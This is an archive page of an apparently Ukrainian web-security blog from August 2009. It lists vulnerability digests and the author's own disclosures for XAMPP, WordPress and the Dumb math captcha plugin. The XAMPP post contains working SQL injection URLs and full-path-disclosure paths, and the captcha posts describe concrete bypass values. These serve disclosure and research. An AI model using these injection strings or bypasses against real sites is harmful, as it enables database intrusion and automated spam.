Архів для категорії 'Уразливості'

Добірка уразливостей

16:24 15.08.2009

В даній добірці уразливості в веб додатках:

  • CA Products That Embed Ingres Multiple Vulnerabilities (деталі)
  • Ingres Database for Linux ingvalidpw Untrusted Library Path Vulnerability (деталі)
  • Ingres Database for Linux libbecompat Stack Based Buffer Overflow Vulnerability (деталі)
  • Ingres Database for Linux verifydb Insecure File Permissions Modification Vulnerability (деталі)
  • menalto gallery: Session hijacking vulnerability, CVE-2008-3662 (деталі)
  • Attachmax Dolphin <= 2.1.0 Multiple Vulnerabilities (деталі)
  • Quick.Cart v3.1 Freeware - Cross Site Scripting (деталі)
  • Quick.Cms.Lite v2.1 Freeware - Cross Site Scripting (деталі)
  • osCommerce 2.2rc2a - Information Disclosure (деталі)
  • DUgallery - ALL VERSIONS (Upload/SQL/) Multiple Remote Vulnerabilities (деталі)

Abuse of Functionality уразливість в WordPress 2.8.3

23:54 14.08.2009

Нещодавно була оприлюднена Abuse of Functionality уразливість в WordPress. Уразливі WordPress 2.8.3 та попередні версії. Зазначу, що я перевірив дану уразливість в WordPress 2.0.11 та 2.6.2 і вона не спрацювала, тому вірогідно вразливі лише останні версії WP.

Використовуючи дану уразливість можна змінити пароль адміна (тобто провести Reset Admin Password атаку).

  • Wordpress <= 2.8.3 Remote Admin Reset Password Vulnerability (деталі)

Cross-Site Scripting уразливість в WordPress 2.8.1

23:57 11.08.2009

Наприкінці липня була оприлюднена Cross-Site Scripting уразливість в WordPress. Уразливі WordPress 2.8.1 та попередні версії.

Використовуючи дану уразливість в WP можна проводити обмежені XSS атаки, зокрема для редирекції адміна на довільний сайт.

  • Wordpress 2.8.1 (url) Remote Cross Site Scripting Exploit (деталі)

Добірка уразливостей

17:34 11.08.2009

В даній добірці уразливості в веб додатках:

  • CenterIM <= 4.22.3 Remote Command Execution Vulnerability (деталі)
  • PhpWebGallery 1.3.4 Multiple Vulnerabilities (XSS/LFI) (деталі)
  • Surgemail 38k4 IMAP server remote stack overflow (деталі)
  • VMSA-2008-0015 Updated ESXi and ESX 3.5 packages address critical security issue in openwsman (деталі)
  • Advanced Electron Forum <= 1.0.6 Remote Code Execution (деталі)
  • Annuaire Telephonique v1.0 Sensetive Files (MDP) (деталі)
  • PHP pro bid v 6.04 SQL injection (деталі)
  • LooYu Web IM 2008 Cross-Site Scripting Vulnerabilities (деталі)
  • cyask 3.x Local File Inclusion Vulnerability (деталі)
  • Sama XSS Bug (деталі)

Уразливість в Dumb math captcha плагіні для WordPress

23:51 08.08.2009

Вчора, 07.08.2009, коли я оприлюднив уразливості в Dumb math captcha для WordPress, я виявив нову Insufficient Anti-automation уразливість Dumb math captcha плагіні для WordPress.

Insufficient Anti-automation:

При передачі параметра action зі значенням commentopenid, значення відповіді капчі не перевіряється, що дозволяє обійти капчу (на сторінках записів). Це автор плагіна зробив чорний хід (backdoor) в капчі, який може бути використаний для її обходу. Така собі spamer friendly капча :-) .

Dumb math captcha CAPTCHA bypass.html

Уразлива версія Dumb math captcha 1.0.

CSRF, SQL Injection та Full path disclosure уразливості в XAMPP

19:23 08.08.2009

01.07.2009

У червні, 27.06.2009, я знайшов Cross-Site Request Forgery, SQL Injection та Full path disclosure уразливості в XAMPP. Про що найближчим часом сповіщу розробникам.

Раніше я вже писав про уразливості в XAMPP.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам системи.

08.08.2009

CSRF:

http://site/xampp/cds-fpdf.php

Можна видаляти та додавати дані в тестовій таблиці (як через CSRF, так і через Insufficient Authorization уразливості). А також проводити SQL Injection через CSRF атаки.

SQL Injection:

http://site/xampp/cds-fpdf.php?action=del&id=-1%20or%201=1 (register globals on)

http://site/xampp/cds-fpdf.php?interpret=1&titel=1&jahr=1),(version(),1,1

http://site/xampp/cds-fpdf.php?interpret=1&titel=',1,1),(version(),1,1)/* (mq off)

http://site/xampp/cds-fpdf.php?titel=1&interpret=',1),(version(),1,1)/* (mq off)

Атака можлива при доступі в адмінку (через Insufficient Authorization), або через CSRF.

Full path disclosure:

http://site/xampp/external/ps/draw.php
http://site/xampp/external/ps/hyperlinks.php
http://site/xampp/external/ps/image.php
http://site/xampp/external/ps/overprint.php
http://site/xampp/external/ps/ps.php?submit=OK
http://site/xampp/external/ps/shading.php
http://site/xampp/external/ps/spotcolor.php
http://site/xampp/external/ps/text.php
http://site/xampp/special/ps/draw.php
http://site/xampp/special/ps/hyperlinks.php
http://site/xampp/special/ps/image.php
http://site/xampp/special/ps/overprint.php
http://site/xampp/special/ps/ps.php?submit=OK
http://site/xampp/special/ps/shading.php
http://site/xampp/special/ps/spotcolor.php
http://site/xampp/special/ps/text.php

Уразливі XAMPP 1.6.8 та попередні версії. Та потенційно наступні версії (включно з останньою версією XAMPP 1.7.1).

Уразливості в Dumb math captcha для WordPress

23:56 07.08.2009

Сьогодні я вияснив, що капча плагін для WordPress, в якому я виявив дірки, що використовуться на сайті www.developers.org.ua, зветься Dumb math captcha. Тобто це не окремий php-скрипт від власників www.developers.org.ua (бо адміни сайта так мені й не відповіли), а саме плагін для WP, який використовувався на декількох сайтах. І враховуючи, що вихідний код цього плагіна доступний в Мережі, його також можуть використати інші люди.

Тому Insufficient Anti-automation та Full path disclosure уразливості, що я знайшов у січні, 22.01.2008, мають місце у Dumb math captcha плагіні для WordPress.

Insufficient Anti-automation:

Капча на сторінках записів вразлива до Constant values bypass method, що я описав в проекті Місяць багів в Капчах.

Для атаки потрібно посилати одне і те саме значення параметра dumb_captcha (dumb_captcha = 9).

Full path disclosure:

http://site/wp-content/plugins/dumb_captcha.php

Уразлива версія Dumb math captcha 1.0.

Добірка уразливостей

16:18 07.08.2009

В даній добірці уразливості в веб додатках:

  • Microsoft SQL Server - Corrupt Backup File Heap Overflow (деталі)
  • Microsoft SQL Server Restore Integer Underflow Vulnerability (деталі)
  • Important Vulnerabilities in Microsoft SQL Server Could Allow Elevation of Privilege (941203) (деталі)
  • Horde, Popoon frameworks common input sanitization errors (XSS) (деталі)
  • Stash v1.0.3 Admin bypass / Remote File Disclosure (деталі)
  • Multiple Vulnerabilities: LedgerSMB < 1.2.15 (деталі)
  • Pro2col StingRay FTS login username cross site scripting (деталі)
  • Multiple vulnerabilities in Nooms 1.1 (деталі)
  • minb Remote Code Execution Exploit (деталі)
  • PhsBlog v0.2 Bypass Sql injection Filtering Exploit (деталі)

Уразливості в Subscribe To Comments для WordPress

23:55 06.08.2009

У грудні, 11.12.2008, я знайшов Cross-Site Request Forgery, Cross-Site Scripting та CRLF Injection уразливості в плагіні Subscribe To Comments для WordPress. Про що найближчим часом сповіщу розробникам.

Раніше я вже писав про уразливості в Subscribe To Comments WordPress plugin.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам плагіна.

Добірка уразливостей

16:15 05.08.2009

В даній добірці уразливості в веб додатках:

  • CiscoWorks Internetwork Performance Monitor Remote Command Execution Vulnerability (деталі)
  • Multiple Cross Site Scripting (XSS) and SQL injection Vulnerabilities in XRMS, CVE-2008-3664 (деталі)
  • Vulnerability in python-django (деталі)
  • aspWebAlbum 3.2 (Upload/SQL/XSS) Multiple Remote Vulnerabilities (деталі)
  • Zen Cart <= 1.3.8a SQL Injection (деталі)
  • HP Select Identity Software, Gain Unauthorized Access (деталі)
  • phpAdultSite CMS flaws (деталі)
  • xoops-1.3.10 shell command execute vulnerability ( causing snoopy class ) (деталі)
  • Cross-domain redirect on RSA Authentication Agent (деталі)
  • XSS on RSA Authentication Agent login page (деталі)